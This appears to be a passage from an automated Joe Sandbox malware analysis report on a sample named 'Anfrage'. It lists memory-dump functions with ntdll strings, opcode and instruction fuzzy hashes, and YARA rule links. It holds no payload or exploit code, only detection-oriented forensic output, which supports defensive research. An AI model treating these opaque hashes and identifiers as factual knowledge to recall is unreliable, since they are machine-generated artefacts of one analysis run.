                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: %$&$@
                                                                          • API String ID: 0-1537733988
                                                                          • Opcode ID: f41ada9249caefd69d4ad168689d6d9671d17e00e84c4c3054012ff4c987959f
                                                                          • Instruction ID: 870637bb944c54aff00bfdd7ad25433bd1dae226a7d1300544dddb50af497670
                                                                          • Opcode Fuzzy Hash: f41ada9249caefd69d4ad168689d6d9671d17e00e84c4c3054012ff4c987959f
                                                                          • Instruction Fuzzy Hash: 2C71C4749293059FE705CF15C980A4BB7E9FF89758F20492DE4994B290DB32D909CB93
                                                                          Function 3649B73C Relevance: 3.9, Strings: 3, Instructions: 180COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • TargetNtPath, xrefs: 3649B82F
                                                                          • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 3649B82A
                                                                          • GlobalizationUserSettings, xrefs: 3649B834
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                                          • API String ID: 0-505981995
                                                                          • Opcode ID: 3bd8f1be0f6bb94396227840296986e0cb76ffaa50e94f704834bdd47113b2b9
                                                                          • Instruction ID: ba59b958e90f2631b4c085b0d44c55b673815912bcb3f451134a380ad8f43882
                                                                          • Opcode Fuzzy Hash: 3bd8f1be0f6bb94396227840296986e0cb76ffaa50e94f704834bdd47113b2b9
                                                                          • Instruction Fuzzy Hash: 0B615A72D51229AFDB21DF55DC88BDABBF8AF14750F4101E9E908A7250CB349E84CF91
                                                                          Function 363BF7BA Relevance: 3.9, Strings: 3, Instructions: 167COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • HEAP: , xrefs: 3641E6B3
                                                                          • HEAP[%wZ]: , xrefs: 3641E6A6
                                                                          • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 3641E6C6
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                                          • API String ID: 0-1340214556
                                                                          • Opcode ID: 93d08e8078ae26d42d302042505f60b83242f4d85a082544a0d99772fe720d97
                                                                          • Instruction ID: 1fd746922bcaf73fd8de02b641caa3bb004bb8407767b45b68bd87060295fe69
                                                                          • Opcode Fuzzy Hash: 93d08e8078ae26d42d302042505f60b83242f4d85a082544a0d99772fe720d97
                                                                          • Instruction Fuzzy Hash: 6E51E179A04744EFF712CFA5C984B9ABBF8EF05344F0450A8E590CBA92D734E941CB51
                                                                          Function 363E15F4 Relevance: 3.9, Strings: 3, Instructions: 166COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • minkernel\ntdll\ldrmap.c, xrefs: 3642A59A
                                                                          • LdrpCompleteMapModule, xrefs: 3642A590
                                                                          • Could not validate the crypto signature for DLL %wZ, xrefs: 3642A589
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                          • API String ID: 0-1676968949
                                                                          • Opcode ID: cb2fd6833e1cc28bdbcf5dc29af10733936f252bc2a1b1ecfa5ac39c47cd41c3
                                                                          • Instruction ID: 801fc8273dd4f6b1d584dbc224c73bcdc10ad06a2666a9ea0db0e6a559b663b4
                                                                          • Opcode Fuzzy Hash: cb2fd6833e1cc28bdbcf5dc29af10733936f252bc2a1b1ecfa5ac39c47cd41c3
                                                                          • Instruction Fuzzy Hash: B451F17AA007549FFB12CF59CD80B06BBE8AF00758F640594ED509B6D1DBB4E981CB51
                                                                          Function 363B758F Relevance: 3.9, Strings: 3, Instructions: 132COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                                                          • API String ID: 0-1151232445
                                                                          • Opcode ID: 82b382b6fa0683b51ea6d53a27637fb509e09f413417aa69fa6ee64f885459d9
                                                                          • Instruction ID: 385bf8c02db5e0b0ea3952b501664da471ec24fae29e8f1539f13517b8f2738a
                                                                          • Opcode Fuzzy Hash: 82b382b6fa0683b51ea6d53a27637fb509e09f413417aa69fa6ee64f885459d9
                                                                          • Instruction Fuzzy Hash: C441E3B8F503408FFF16CF1AC4847A977B2DF01384F644469D5958BB46DAB4D88ACB52
                                                                          Function 363F16CF Relevance: 3.9, Strings: 3, Instructions: 127COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • LdrpAllocateTls, xrefs: 36431B40
                                                                          • minkernel\ntdll\ldrtls.c, xrefs: 36431B4A
                                                                          • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 36431B39
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                                                          • API String ID: 0-4274184382
                                                                          • Opcode ID: 391126d1d916311c0c23263cae27d25757c50ddcf9f1ba5a8fca6d3b84e112d1
                                                                          • Instruction ID: a5a45f7c132b2fe6afbd2845d51cd8991d13e259a79a74881c1e4eba4d547a26
                                                                          • Opcode Fuzzy Hash: 391126d1d916311c0c23263cae27d25757c50ddcf9f1ba5a8fca6d3b84e112d1
                                                                          • Instruction Fuzzy Hash: 7E418AB5E01604AFDB15CFA9DD81BAEBBF6FF48314F108119E405AB200EB75A815CF91
                                                                          Function 36475180 Relevance: 3.9, Strings: 3, Instructions: 114COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Leaked Block 0x%p size 0x%p (stack %p depth %u)$HEAP: $HEAP[%wZ]:
                                                                          • API String ID: 0-964947082
                                                                          • Opcode ID: 76b0359df4266783dcd8d95b996e25e1d5ebb04cdda7fb90f2fad660e14807f9
                                                                          • Instruction ID: 4132aa493e7ee5a5bc338d1191a2c86f12a4b5be1d3c93e8fd5d46a24c1dce8e
                                                                          • Opcode Fuzzy Hash: 76b0359df4266783dcd8d95b996e25e1d5ebb04cdda7fb90f2fad660e14807f9
                                                                          • Instruction Fuzzy Hash: 2A41C2B5E01354AFDB16CF66D880FEA7BA9EF04314F504069EAA1AF240DE30D855CF91
                                                                          Function 363F33A0 Relevance: 3.9, Strings: 3, Instructions: 111COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • SXS: %s() passed the empty activation context data, xrefs: 364329FE
                                                                          • RtlCreateActivationContext, xrefs: 364329F9
                                                                          • Actx , xrefs: 363F33AC
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                                                          • API String ID: 0-859632880
                                                                          • Opcode ID: 4e87f0139ea591debfb007e5ebcc9deecdc97d742853166abcecb0ad4007821a
                                                                          • Instruction ID: 8e005f64db47997dff16f0dae708b21b3b941e69d6a116a7a629a25201f5323e
                                                                          • Opcode Fuzzy Hash: 4e87f0139ea591debfb007e5ebcc9deecdc97d742853166abcecb0ad4007821a
                                                                          • Instruction Fuzzy Hash: 44312F32A213119FFB12DE69D880B9A37A8FF48760F214469ED049F381CB32E855CBD1
                                                                          Function 3644B594 Relevance: 3.9, Strings: 3, Instructions: 107COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • @, xrefs: 3644B670
                                                                          • GlobalFlag, xrefs: 3644B68F
                                                                          • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 3644B632
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                                                          • API String ID: 0-4192008846
                                                                          • Opcode ID: 265ce49c8315bb758f01cc2d4c7667e96a31bd33aa646bfefbca339e1c38d5a3
                                                                          • Instruction ID: b9b6b0e50f69cb7bddcc8eb225f87e99eec0137ddef05be6ddef4cf6047c76ec
                                                                          • Opcode Fuzzy Hash: 265ce49c8315bb758f01cc2d4c7667e96a31bd33aa646bfefbca339e1c38d5a3
                                                                          • Instruction Fuzzy Hash: 38315DB5E00219AFEB02EFA5DC81AEFBBB8EF44744F500469E605A7250D774DE04CBA5
                                                                          Function 364613B9 Relevance: 3.9, Strings: 3, Instructions: 101COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @$OsBootstatPath$\REGISTRY\MACHINE\SYSTEM\CurrentControlSet\Control
                                                                          • API String ID: 0-1050206962
                                                                          • Opcode ID: 0602c69080c3208885b9cf0d113d2f28135f272bcc4e898927fe6df94763b6ab
                                                                          • Instruction ID: 4a28afa00fb5553b258b1c9c7549f2ad8ecab6f5aeaa4d866bf40835edd6cfc8
                                                                          • Opcode Fuzzy Hash: 0602c69080c3208885b9cf0d113d2f28135f272bcc4e898927fe6df94763b6ab
                                                                          • Instruction Fuzzy Hash: 75318EB2D00229AFEB02DF95CC84EAEBBBDEB44658F410479E900A7210D778DD048BA1
                                                                          Function 363F1607 Relevance: 3.8, Strings: 3, Instructions: 98COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • LdrpInitializeTls, xrefs: 36431A47
                                                                          • DLL "%wZ" has TLS information at %p, xrefs: 36431A40
                                                                          • minkernel\ntdll\ldrtls.c, xrefs: 36431A51
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                                          • API String ID: 0-931879808
                                                                          • Opcode ID: f577fa088aaa688921788fd9f21f146916817fbcad7240f11db5da2f4aeb9bfd
                                                                          • Instruction ID: 5ae9dd523366b76e35729a3b5a040c7173de55c900250e6dab85e7d00ae0ee24
                                                                          • Opcode Fuzzy Hash: f577fa088aaa688921788fd9f21f146916817fbcad7240f11db5da2f4aeb9bfd
                                                                          • Instruction Fuzzy Hash: 5D31EF32E20200ABFB15DF48DC81F6ABABEEB54358F140119FA40BF280DB71AD4587A1
                                                                          Function 363B74B0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 117timeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: RtlValidateHeap
                                                                          • API String ID: 3446177414-1797218451
                                                                          • Opcode ID: 8ddb41bbab6103c67abf4e949feeae4a603c40ac672bd1ebcaa448158c00db48
                                                                          • Instruction ID: 8c07243fd95a80ba11019195924a4e5fe854562947b1853647d6e7a5f24d2d5e
                                                                          • Opcode Fuzzy Hash: 8ddb41bbab6103c67abf4e949feeae4a603c40ac672bd1ebcaa448158c00db48
                                                                          • Instruction Fuzzy Hash: 81412276E403559FEF02CF64C8947AEBBB6FF41314F048259D4516B780CB349A45CB95
                                                                          Function 3646705E Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 112timeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: kLsE
                                                                          • API String ID: 3446177414-3058123920
                                                                          • Opcode ID: 57d782ea0b11b72cdea52a9ed90722abf948a5eebfd81c683bc5235f89169322
                                                                          • Instruction ID: 17d77341eef572a22a0e241597484bebfdedaa5dd9379b011470773c8b3e1aab
                                                                          • Opcode Fuzzy Hash: 57d782ea0b11b72cdea52a9ed90722abf948a5eebfd81c683bc5235f89169322
                                                                          • Instruction Fuzzy Hash: DD413772D0134087EB12DF66DD88BA53F95AB01768F200119EED06B2C5CB754893C7B2
                                                                          Function 363D52A0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @$@
                                                                          • API String ID: 0-149943524
                                                                          • Opcode ID: 972b809a6a847ceb870da5af72ac7627471bfa95c5a85d32d59a80b1917864d1
                                                                          • Instruction ID: 4232d3370d8290fa4e9b088dd74765575f85516f06a5bfdbd48c5c7fc24ad6a1
                                                                          • Opcode Fuzzy Hash: 972b809a6a847ceb870da5af72ac7627471bfa95c5a85d32d59a80b1917864d1
                                                                          • Instruction Fuzzy Hash: BB32AEBA9083618FE714CF16C88073EB7E5EF847A4F60492EF99597290E734C954CB92
                                                                          Function 363C5702 Relevance: 3.1, APIs: 2, Instructions: 104timeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID:
                                                                          • API String ID: 3446177414-0
                                                                          • Opcode ID: 18d2aa2c71243b5221a63a07238d0965a0d7578fc300c6b137a2ec35966918ce
                                                                          • Instruction ID: 6ed708d63c085595cc2660fc2c6916ba43bb308a5f8b15bfa1cb6920cf6bf560
                                                                          • Opcode Fuzzy Hash: 18d2aa2c71243b5221a63a07238d0965a0d7578fc300c6b137a2ec35966918ce
                                                                          • Instruction Fuzzy Hash: 2131D035A11B12EFE7458F20CE80A8AFBA9FF44758F109025E94047A50DB70EC30DBD1
                                                                          Function 363DF720 Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: $$$
                                                                          • API String ID: 3446177414-233714265
                                                                          • Opcode ID: e339b0776deb65a343ee3f21f508fc4c4ed3ffd968d0dc4379b5bc0940487690
                                                                          • Instruction ID: ed87cacc50dae82b9f164b70528c6dadf18b74a173ec0cc4dfac1b318d78b674
                                                                          • Opcode Fuzzy Hash: e339b0776deb65a343ee3f21f508fc4c4ed3ffd968d0dc4379b5bc0940487690
                                                                          • Instruction Fuzzy Hash: 69619A76E44749DFEB21CFA5C9D0BA9BBF2BF44308F10406DD519AB680CB34A945CB92
                                                                          Function 364535BA Relevance: 2.6, Strings: 2, Instructions: 99COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                                                          • API String ID: 0-118005554
                                                                          • Opcode ID: 216d98d665a6d418bb71eed0c64e3d51b46752a47188586f237c1e9c2432cba1
                                                                          • Instruction ID: f64bb656dec42e7051024db5eb67823f962f43c98bc8fcd8cf1eab0508bfe251
                                                                          • Opcode Fuzzy Hash: 216d98d665a6d418bb71eed0c64e3d51b46752a47188586f237c1e9c2432cba1
                                                                          • Instruction Fuzzy Hash: 7A31AE76A087419BE312CF25D884B1AB7E4EF85754F06186DF9548B390FB30D905CB93
                                                                          Function 363F329E Relevance: 2.6, Strings: 2, Instructions: 93COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: .Local\$@
                                                                          • API String ID: 0-380025441
                                                                          • Opcode ID: c3ecf61c14b77dc4865dd93e8b6f3e78513abbf96b3d96ae833fc07e424bc680
                                                                          • Instruction ID: 3f89013913b590bdbe6f093876016906c5a0484ae18b78e8bcb0720719daeb61
                                                                          • Opcode Fuzzy Hash: c3ecf61c14b77dc4865dd93e8b6f3e78513abbf96b3d96ae833fc07e424bc680
                                                                          • Instruction Fuzzy Hash: 25318FB69593159FF311CF28C880A5BBBE8EF85694F40092EF99487250DA36DD08CBD3
                                                                          Function 363F34B0 Relevance: 2.6, Strings: 2, Instructions: 66COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 36432A95
                                                                          • RtlpInitializeAssemblyStorageMap, xrefs: 36432A90
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                                                          • API String ID: 0-2653619699
                                                                          • Opcode ID: c2997df6dce9304f02986e2a1f1b3c0664c00c028f6fbb0721a6b02b7577cd2d
                                                                          • Instruction ID: ea40113c86d5d3e3db0c246260ac959dc50c00386b5f0c548cdb46bdb1973eb2
                                                                          • Opcode Fuzzy Hash: c2997df6dce9304f02986e2a1f1b3c0664c00c028f6fbb0721a6b02b7577cd2d
                                                                          • Instruction Fuzzy Hash: ED113676F11310ABF7268E59CD81F6B76ADDB84B54F248029B900EF340D676CD00C6E1
                                                                          Function 363EB2C0 Relevance: 1.9, Strings: 1, Instructions: 629COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @[K6@[K6
                                                                          • API String ID: 0-22646139
                                                                          • Opcode ID: 78c9ff470df6420b7a74997d2454918220740dd5b34162e963190ed193d661d8
                                                                          • Instruction ID: 9547738da6cbbb581aaa52e80ab23e68e9e7b6827890fad7c3319c5e768bd9ff
                                                                          • Opcode Fuzzy Hash: 78c9ff470df6420b7a74997d2454918220740dd5b34162e963190ed193d661d8
                                                                          • Instruction Fuzzy Hash: 6B32C2B6E01229DFDF15CF99C990BAEBBB5FF44754F140029E806AB380E7359911CBA1
                                                                          Function 364931E1 Relevance: 1.8, APIs: 1, Instructions: 281COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • @_EH4_CallFilterFunc@8.LIBCMT ref: 36493356
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
